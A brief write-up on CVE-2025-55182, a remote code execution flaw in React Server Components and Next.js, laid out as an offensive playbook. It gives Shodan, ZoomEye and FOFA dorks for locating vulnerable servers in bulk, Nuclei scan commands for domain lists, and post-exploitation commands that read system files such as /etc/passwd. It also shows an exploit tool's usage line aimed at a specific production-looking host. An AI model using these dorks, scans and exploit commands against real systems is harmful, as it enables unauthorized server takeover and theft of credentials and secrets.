Analyzing CVE-2025-55182: React Server Components RCE in Next.js Applications

Summary

React2Shell (CVE-2025-55182) is a critical Remote Code Execution (RCE) vulnerability affecting applications that use React Server Components (RSC), which are commonly deployed in Next.js environments. The flaw arises from unsafe deserialization and command execution paths in RSC request handling, allowing attackers to execute arbitrary system commands on the server.

Severity: Critical
Attack Vector: Remote (unauthenticated in many cases)
Impact: Full server compromise
Affected Stack: React Server Components / Next.js

Search Engine Dorks

Shodan

http.component:"next.js,react"
http.component:"Next.js"

ZoomEye

http.body="react.production.min.js"
http.body="React.createElement("
app="React Router"

FOFA

app="NEXT.JS"
app="React.js"

Detection & Validation

Automated Scanning

Nuclei Template (Official):

https://cloud.projectdiscovery.io/library/CVE-2025-55182
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-55182.yaml

echo domain.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-55182.yaml
cat domains.txt | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-55182.yaml

Browser-Based

RSC Detector Extension

https://github.com/mrknow001/RSC_Detector

----Command
cat /etc/passwd
ls -la
uname -a
id

Tools

https://github.com/Chocapikk/CVE-2025-55182
python3 exploit.py -u https://prod-daash.ryvalx.com -c "id"

Impact

Successful exploitation allows an attacker to:

  • Execute arbitrary OS commands
  • Read sensitive files (environment variables, secrets)
  • Pivot laterally inside infrastructure
  • Achieve full application takeover
  • Potentially compromise CI/CD pipelines

Business Impact:

  • Data breaches
  • Credential exposure
  • Supply chain compromise
  • Complete loss of application integrity